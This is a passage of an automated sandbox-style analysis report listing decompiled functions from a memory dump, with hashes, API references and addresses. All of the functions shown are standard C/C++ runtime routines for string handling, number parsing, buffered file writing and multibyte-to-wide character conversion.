Opcode Fuzzy Hash: 17808142ff931e9e0ed30cdd76d69fd746b779072b4fed4f53fb78a8be029f49
Instruction Fuzzy Hash: D7310872300A44CBD724DA6CF88096AFBEAFF95734F210A2AF192CB641D7719C408395

Uniqueness

Uniqueness Score: -1.00%

Function 00863330, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00863330(intOrPtr* _a4, char _a8, intOrPtr _a12, char _a16, void* _a24, signed int* _a28, signed int* _a32) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v47;
				char _v48;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t47;
				void* _t51;
				signed int* _t52;
				intOrPtr* _t53;
				signed int _t57;
				void* _t58;
				signed int _t59;
				signed int _t77;
				signed int _t83;
				signed int _t89;

				_t79 = _a24;
				_v8 = 0;
				_t77 =  *( *(_a24 + 0x30));
				_v12 = _t77;
				E008696AD( &_a24, 0);
				_t41 =  *(_t77 + 4);
				if(_t41 < 0xffffffff) {
					_t57 = _t41 + 1;
					_t89 = _t57;
					 *(_t77 + 4) = _t57;
				}
				E008696D5( &_a24);
				_t58 = E00864760( &_v12,  *((intOrPtr*)(_t79 + 0x14)),  &_a8, _t89,  &_v48,  &_a16);
				E008696AD( &_a24, 0);
				_t47 =  *(_t77 + 4);
				if(_t47 != 0 && _t47 < 0xffffffff) {
					 *(_t77 + 4) = _t47 - 1;
				}
				asm("sbb esi, esi");
				E008696D5( &_a24);
				_t83 =  !( ~( *(_t77 + 4))) & _t77;
				if(_t83 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t83))))(1);
				}
				if(_v48 != 0x2d) {
					_a24 =  &_v48;
				} else {
					_a24 =  &_v47;
				}
				_t59 = E00869C6F(_a24,  &_v16, _t58,  &_v8);
				_t51 = E00867BC0( &_a16,  &_a8);
				_t52 = _a28;
				if(_t51 != 0) {
					 *_t52 =  *_t52 | 0x00000001;
				}
				if(_v16 == _a24 || _v8 != 0 || _t59 > 0xffff) {
					 *_t52 =  *_t52 | 0x00000002;
					__eflags =  *_t52;
				} else {
					if(_v48 == 0x2d) {
						_t59 =  ~_t59;
					}
					 *_a32 = _t59;
				}
				_t53 = _a4;
				 *_t53 = _a8;
				 *((intOrPtr*)(_t53 + 4)) = _a12;
				return _t53;
			}

0x00863338
0x0086333f
0x00863346
0x0086334d
0x00863350
0x00863355
0x0086335b
0x0086335d
0x0086335d
0x0086335e
0x0086335e
0x00863364
0x00863387
0x00863389
0x0086338e
0x00863393
0x0086339b
0x0086339b
0x008633a3
0x008633aa
0x008633af
0x008633b1
0x008633bb
0x008633bb
0x008633c1
0x008633ce
0x008633c3
0x008633c6
0x008633c6
0x008633ec
0x008633ee
0x008633f5
0x008633f8
0x008633fa
0x008633fa
0x00863403
0x00863423
0x00863423
0x00863413
0x00863417
0x00863419
0x00863419
0x0086341e
0x0086341e
0x00863426
0x00863431
0x00863433
0x0086343a

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00863350
std::_Lockit::_Lockit.LIBCPMT ref: 00863389
__Stoulx.LIBCPMT ref: 008633DE

Strings

-, xrefs: 00863413

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 3418229591-2547889144
Opcode ID: e1588465e69c5b49b9b51b240884f072bdcaae09ca0372b3a0cd5b9f0461b0b2
Instruction ID: 713d5c4ce806fc9620578a6100cf044cba565efd3a60e5d7c2d840bfeb6eacfc
Opcode Fuzzy Hash: e1588465e69c5b49b9b51b240884f072bdcaae09ca0372b3a0cd5b9f0461b0b2
Instruction Fuzzy Hash: 55416171900209DFCB14DF68D581AEEB7B8FF98314F118256EC25E7380EB34AA15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00863440, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00863440(intOrPtr* _a4, char _a8, intOrPtr _a12, char _a16, void* _a24, signed int* _a28, signed int* _a32) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v47;
				char _v48;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t47;
				void* _t51;
				signed int* _t52;
				intOrPtr* _t53;
				signed int _t57;
				void* _t58;
				signed int _t59;
				signed int _t77;
				signed int _t83;
				signed int _t89;

				_t79 = _a24;
				_v8 = 0;
				_t77 =  *( *(_a24 + 0x30));
				_v12 = _t77;
				E008696AD( &_a24, 0);
				_t41 =  *(_t77 + 4);
				if(_t41 < 0xffffffff) {
					_t57 = _t41 + 1;
					_t89 = _t57;
					 *(_t77 + 4) = _t57;
				}
				E008696D5( &_a24);
				_t58 = E00864760( &_v12,  *((intOrPtr*)(_t79 + 0x14)),  &_a8, _t89,  &_v48,  &_a16);
				E008696AD( &_a24, 0);
				_t47 =  *(_t77 + 4);
				if(_t47 != 0 && _t47 < 0xffffffff) {
					 *(_t77 + 4) = _t47 - 1;
				}
				asm("sbb esi, esi");
				E008696D5( &_a24);
				_t83 =  !( ~( *(_t77 + 4))) & _t77;
				if(_t83 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t83))))(1);
				}
				if(_v48 != 0x2d) {
					_a24 =  &_v48;
				} else {
					_a24 =  &_v47;
				}
				_t59 = E00869C6F(_a24,  &_v16, _t58,  &_v8);
				_t51 = E00867BC0( &_a16,  &_a8);
				_t52 = _a28;
				if(_t51 != 0) {
					 *_t52 =  *_t52 | 0x00000001;
				}
				if(_v16 == _a24 || _v8 != 0 || _t59 > 0xffffffff) {
					 *_t52 =  *_t52 | 0x00000002;
					__eflags =  *_t52;
				} else {
					if(_v48 == 0x2d) {
						_t59 =  ~_t59;
					}
					 *_a32 = _t59;
				}
				_t53 = _a4;
				 *_t53 = _a8;
				 *((intOrPtr*)(_t53 + 4)) = _a12;
				return _t53;
			}

0x00863448
0x0086344f
0x00863456
0x0086345d
0x00863460
0x00863465
0x0086346b
0x0086346d
0x0086346d
0x0086346e
0x0086346e
0x00863474
0x00863497
0x00863499
0x0086349e
0x008634a3
0x008634ab
0x008634ab
0x008634b3
0x008634ba
0x008634bf
0x008634c1
0x008634cb
0x008634cb
0x008634d1
0x008634de
0x008634d3
0x008634d6
0x008634d6
0x008634fc
0x008634fe
0x00863505
0x00863508
0x0086350a
0x0086350a
0x00863513
0x0086352f
0x0086352f
0x00863520
0x00863524
0x00863526
0x00863526
0x0086352b
0x0086352b
0x00863532
0x0086353d
0x0086353f
0x00863546

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00863460
std::_Lockit::_Lockit.LIBCPMT ref: 00863499
__Stoulx.LIBCPMT ref: 008634EE

Strings

-, xrefs: 00863520

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 3418229591-2547889144
Opcode ID: 5711fab1c6786d182876c735e524f013a81789b9ab570c0f8da3ad36cf76cc69
Instruction ID: 60bb7b0241e4b8005f8a6e81b77ebb71c69e0f5cdfbe886288bd2f1dd25b5f90
Opcode Fuzzy Hash: 5711fab1c6786d182876c735e524f013a81789b9ab570c0f8da3ad36cf76cc69
Instruction Fuzzy Hash: A0415EB5A0020E9FCB14DF68C481ADEB7B8FF58324F118256E825E7280DB34AA15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00865A00, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00865A00(signed int __ecx, intOrPtr _a4, char _a8) {
				intOrPtr _t18;
				intOrPtr* _t20;
				char* _t28;
				intOrPtr _t32;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t43;
				intOrPtr* _t48;

				_t32 = _a4;
				_t48 = __ecx;
				_t18 =  *((intOrPtr*)(__ecx + 0x10));
				if((__ecx | 0xffffffff) - _t18 <= _t32) {
					_t18 = E00869598("string too long");
				}
				if(_t32 == 0) {
					L23:
					return _t48;
				} else {
					_t43 = _t18 + _t32;
					if(_t43 > 0xfffffffe) {
						_t18 = E00869598("string too long");
					}
					_t36 =  *((intOrPtr*)(_t48 + 0x14));
					if(_t36 >= _t43) {
						if(_t43 != 0) {
							goto L7;
						} else {
							 *((intOrPtr*)(_t48 + 0x10)) = _t43;
							if(_t36 < 0x10) {
								_t28 = _t48;
								 *_t28 = 0;
								return _t28;
							} else {
								 *((char*)( *_t48)) = 0;
								return _t48;
							}
						}
					} else {
						E00866E50(_t48, _t43, _t18);
						if(_t43 == 0) {
							L22:
							goto L23;
						} else {
							L7:
							_t37 =  *((intOrPtr*)(_t48 + 0x10));
							if(_t32 != 1) {
								if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
									_t20 = _t48;
								} else {
									_t20 =  *_t48;
								}
								E0086C140(_t20 + _t37, _a8, _t32);
							} else {
								if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
									 *((char*)(_t48 + _t37)) = _a8;
								} else {
									 *((char*)( *_t48 + _t37)) = _a8;
								}
							}
							 *((intOrPtr*)(_t48 + 0x10)) = _t43;
							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
								 *((char*)(_t48 + _t43)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t48 + _t43)) = 0;
								return _t48;
							}
						}
					}
				}
			}

0x00865a04
0x00865a08
0x00865a0a
0x00865a14
0x00865a1b
0x00865a1b
0x00865a22
0x00865ad7
0x00865adc
0x00865a28
0x00865a29
0x00865a2f
0x00865a36
0x00865a36
0x00865a3b
0x00865a40
0x00865a6d
0x00000000
0x00865a6f
0x00865a6f
0x00865a75
0x00865a86
0x00865a89
0x00865a8e
0x00865a77
0x00865a7a
0x00865a82
0x00865a82
0x00865a75
0x00865a42
0x00865a46
0x00865a4d
0x00865ad6
0x00000000
0x00865a53
0x00865a53
0x00865a53
0x00865a59
0x00865a9f
0x00865aa5
0x00865aa1
0x00865aa1
0x00865aa1
0x00865ab0
0x00865a5b
0x00865a5f
0x00865a96
0x00865a61
0x00865a66
0x00865a66
0x00865a5f
0x00865abc
0x00865abf
0x00865ad2
0x00000000
0x00865ac1
0x00865ac3
0x00865acd
0x00865acd
0x00865abf
0x00865a4d
0x00865a40

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00865A1B

Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695AD
Part of subcall function 00869598: __CxxThrowException@8.LIBCMT ref: 008695C2
Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695D3

std::_Xinvalid_argument.LIBCPMT ref: 00865A36

Strings

string too long, xrefs: 00865A16, 00865A31

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 75b306e831095392811dad41a9f930097f7ecd3584842215522759a82654b81a
Instruction ID: 133fc7943f2734843e1697beb4e18b55269789cc22e5a718b44b6cdba3e2365a
Opcode Fuzzy Hash: 75b306e831095392811dad41a9f930097f7ecd3584842215522759a82654b81a
Instruction Fuzzy Hash: 21210C32304A644BD731AE9CE4C0969F7E9FFA5721F12471FF592CB691C7B198048391

Uniqueness

Uniqueness Score: -1.00%

Function 00865BD0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00865BD0(intOrPtr* __ecx, intOrPtr _a4, char _a8) {
				intOrPtr _t14;
				intOrPtr* _t15;
				char* _t23;
				intOrPtr _t34;
				intOrPtr* _t35;

				_t30 = __ecx;
				_t34 = _a4;
				_t35 = __ecx;
				if(_t34 == 0xffffffff) {
					E00869598("string too long");
				}
				if(_t34 > 0xfffffffe) {
					E00869598("string too long");
				}
				_t14 =  *((intOrPtr*)(_t35 + 0x14));
				if(_t14 >= _t34) {
					if(_t34 != 0) {
						goto L6;
					} else {
						 *((intOrPtr*)(_t35 + 0x10)) = _t34;
						if(_t14 < 0x10) {
							_t23 = _t35;
							 *_t23 = 0;
							return _t23;
						} else {
							 *((char*)( *_t35)) = 0;
							return _t35;
						}
					}
				} else {
					E00866E50(_t30, _t34,  *((intOrPtr*)(_t35 + 0x10)));
					if(_t34 == 0) {
						L21:
						return _t35;
					} else {
						L6:
						if(_t34 != 1) {
							if( *((intOrPtr*)(_t35 + 0x14)) < 0x10) {
								_t15 = _t35;
							} else {
								_t15 =  *_t35;
							}
							E0086C140(_t15, _a8, _t34);
						} else {
							if( *((intOrPtr*)(_t35 + 0x14)) < 0x10) {
								 *_t35 = _a8;
							} else {
								 *((char*)( *_t35)) = _a8;
							}
						}
						 *((intOrPtr*)(_t35 + 0x10)) = _t34;
						if( *((intOrPtr*)(_t35 + 0x14)) < 0x10) {
							 *((char*)(_t35 + _t34)) = 0;
							goto L21;
						} else {
							 *((char*)( *_t35 + _t34)) = 0;
							return _t35;
						}
					}
				}
			}

0x00865bd0
0x00865bd5
0x00865bd8
0x00865bdd
0x00865be4
0x00865be4
0x00865bec
0x00865bf3
0x00865bf3
0x00865bf8
0x00865bfd
0x00865c23
0x00000000
0x00865c25
0x00865c25
0x00865c2b
0x00865c3a
0x00865c3d
0x00865c42
0x00865c2d
0x00865c2f
0x00865c37
0x00865c37
0x00865c2b
0x00865bff
0x00865c04
0x00865c0b
0x00865c87
0x00865c8b
0x00865c0d
0x00865c0d
0x00865c10
0x00865c52
0x00865c58
0x00865c54
0x00865c54
0x00865c54
0x00865c61
0x00865c12
0x00865c16
0x00865c4a
0x00865c18
0x00865c1d
0x00865c1d
0x00865c16
0x00865c6d
0x00865c70
0x00865c82
0x00000000
0x00865c72
0x00865c74
0x00865c7d
0x00865c7d
0x00865c70
0x00865c0b

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00865BE4

Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695AD
Part of subcall function 00869598: __CxxThrowException@8.LIBCMT ref: 008695C2
Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695D3

std::_Xinvalid_argument.LIBCPMT ref: 00865BF3

Strings

string too long, xrefs: 00865BDF, 00865BEE

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: b8853978754e0b0e7ff7c5e38fcf3f989ea00890d8fb675d403de8d1d6b71c84
Instruction ID: 4883f6d7fc2132b0cc015d8de2ad0704bce0d20610ef3d53c15c9c33fee7d9ce
Opcode Fuzzy Hash: b8853978754e0b0e7ff7c5e38fcf3f989ea00890d8fb675d403de8d1d6b71c84
Instruction Fuzzy Hash: A121AA32304B548BD7329B5CA80096AFBE9FFA6721F56495AF5D1CB351C272D84087A2

Uniqueness

Uniqueness Score: -1.00%

Function 0086C9FC, Relevance: 6.1, APIs: 4, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0086C9FC(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E0086F35F(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E00873102(_t96));
										_t71 = E0087390A(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E0086C6AB(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E0086B710( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E0086AF94(_t100))) = 0x16;
					E0086F2F0();
					goto L4;
				}
			}

0x0086ca07
0x0086ca0c
0x0086ca2b
0x00000000
0x0086ca14
0x0086ca14
0x0086ca17
0x0086ca19
0x0086ca32
0x0086ca35
0x0086ca37
0x00000000
0x00000000
0x0086ca39
0x0086ca3e
0x0086ca40
0x0086ca43
0x00000000
0x00000000
0x0086ca45
0x0086ca49
0x0086ca50
0x0086ca53
0x0086ca56
0x0086ca58
0x0086ca62
0x0086ca5a
0x0086ca5d
0x0086ca5d
0x0086ca69
0x0086ca6b
0x0086cb30
0x00000000
0x0086ca71
0x0086ca71
0x0086ca74
0x0086ca74
0x0086ca7a
0x0086caab
0x0086caab
0x0086caae
0x0086cb07
0x0086cb0e
0x0086cb11
0x0086cb3c
0x0086cb3c
0x0086cb3e
0x00000000
0x0086cb42
0x0086cb13
0x0086cb16
0x0086cb19
0x0086cb1a
0x0086cb1d
0x0086cb1f
0x0086cb21
0x0086cb21
0x00000000
0x0086cb1f
0x0086cab0
0x0086cab2
0x0086cabf
0x0086cabf
0x0086cac3
0x0086cac5
0x0086cac9
0x0086cacb
0x0086cace
0x0086cace
0x0086cace
0x0086cad0
0x0086cad1
0x0086cadb
0x0086cadc
0x0086cae1
0x0086cae4
0x0086cae7
0x0086cb4a
0x0086cb4a
0x0086cb4e
0x00000000
0x0086cae9
0x0086cae9
0x0086caeb
0x0086caed
0x0086caef
0x0086caef
0x0086caf1
0x0086caf4
0x0086caf6
0x0086caf8
0x00000000
0x0086cafa
0x0086cafa
0x0086cafa
0x00000000
0x0086cafa
0x0086caf8
0x0086cae7
0x0086cab5
0x0086cabb
0x0086cabd
0x00000000
0x00000000
0x00000000
0x0086cabd
0x0086ca7c
0x0086ca7f
0x0086ca81
0x00000000
0x00000000
0x0086ca83
0x0086cb38
0x0086cb38
0x0086cb38
0x00000000
0x0086cb38
0x0086ca89
0x0086ca8b
0x0086ca8d
0x0086ca8f
0x0086ca8f
0x0086ca97
0x0086ca9c
0x0086ca9f
0x0086caa1
0x0086caa4
0x0086caa6
0x00000000
0x0086cb28
0x0086cb28
0x0086cb28
0x00000000
0x0086ca71
0x0086ca6b
0x0086ca1b
0x0086ca20
0x0086ca26
0x00000000
0x0086ca26

APIs

_memmove.LIBCMT ref: 0086CA97
__flush.LIBCMT ref: 0086CAB5
__write.LIBCMT ref: 0086CADC
__flsbuf.LIBCMT ref: 0086CB07

Part of subcall function 0086AF94: __getptd_noexit.LIBCMT ref: 0086AF94

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 8d74979e6de807a62310cfe5daebbee4486607f1fd3a0950a48ba202c74f0e07
Instruction ID: 521bb79f16c95989daf83aa1aa224a2ff7b0b096eeae8bf84aa19348c4579c31
Opcode Fuzzy Hash: 8d74979e6de807a62310cfe5daebbee4486607f1fd3a0950a48ba202c74f0e07
Instruction Fuzzy Hash: 1E41D6B1A0061C9BDB24DFE99885A7EBBB5FF80361F2A862DE495D7140D770DD41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0087A6C6, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0087A6C6(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E0086B3D0( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00877F3E( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0086AF94(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0087a6d0
0x0087a6d7
0x0087a6ee
0x00000000
0x0087a6de
0x0087a6e0
0x0087a6fa
0x0087a6ff
0x0087a702
0x0087a705
0x0087a72d
0x0087a734
0x0087a736
0x0087a7b7
0x0087a7d2
0x0087a7d4
0x0087a714
0x0087a714
0x0087a717
0x0087a719
0x0087a71c
0x0087a71c
0x0087a71c
0x0087a71c
0x00000000
0x0087a722
0x0087a796
0x0087a796
0x0087a79b
0x0087a7a1
0x0087a7a4
0x0087a7a6
0x0087a7a9
0x0087a7a9
0x0087a7a9
0x0087a7a9
0x00000000
0x0087a7ad
0x0087a738
0x0087a73b
0x0087a741
0x0087a744
0x0087a76b
0x0087a76e
0x0087a774
0x00000000
0x00000000
0x0087a776
0x0087a779
0x00000000
0x00000000
0x0087a77b
0x0087a77b
0x0087a781
0x0087a784
0x0087a6f3
0x0087a6f3
0x0087a78d
0x00000000
0x0087a78d
0x0087a746
0x0087a749
0x00000000
0x00000000
0x0087a74d
0x0087a75e
0x0087a764
0x0087a766
0x0087a769
0x00000000
0x00000000
0x00000000
0x0087a769
0x0087a707
0x0087a70a
0x0087a70c
0x0087a711
0x0087a711
0x00000000
0x0087a6e2
0x0087a6e2
0x0087a6e7
0x0087a6eb
0x0087a6eb
0x00000000
0x0087a6e7
0x0087a6e0

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0087A6FA
__isleadbyte_l.LIBCMT ref: 0087A72D
MultiByteToWideChar.KERNEL32(00000080,00000009,0086F56D,?,00000000,00000000,?,?,?,?,0086F56D,00000000), ref: 0087A75E
MultiByteToWideChar.KERNEL32(00000080,00000009,0086F56D,00000001,00000000,00000000,?,?,?,?,0086F56D,00000000), ref: 0087A7CC

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 943cb32e171e2a18d39bec4f50435c70c02f533b5783680c73af091a842277aa
Instruction ID: 6852914fe39c7ad6631bb8429fb3fad04d703857f961cbdc82521f7595a2dae2
Opcode Fuzzy Hash: 943cb32e171e2a18d39bec4f50435c70c02f533b5783680c73af091a842277aa
Instruction Fuzzy Hash: 5D31AF31600249EFCB28DF68C884ABE3BB5FF81350B19C569E4A9DB195E730D980DB52

Uniqueness

Uniqueness Score: -1.00%

